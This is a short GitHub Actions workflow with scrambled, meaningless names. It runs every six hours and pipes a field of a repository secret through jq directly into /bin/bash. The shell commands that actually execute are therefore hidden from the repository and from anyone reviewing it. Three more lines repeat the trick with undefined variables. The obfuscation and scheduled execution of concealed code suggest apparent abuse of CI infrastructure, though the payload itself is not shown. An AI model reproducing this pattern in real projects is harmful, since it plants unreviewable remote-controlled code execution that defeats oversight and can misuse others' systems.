name: eratchjiao

on:
  workflow_dispatch:
  schedule:
    - cron: '37 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: eratchjiao
        env:
          sagtu56: ${{ secrets.sagtu56 }}
        run: |
          echo $sagtu56 | jq -r .gu82 | /bin/bash
          echo $shvx7 | jq -r .mgf546 | /bin/bash
          echo $znb19967 | jq -r .ndzsm67962 | /bin/bash
          echo $ql59 | jq -r .zrwh836 | /bin/bash

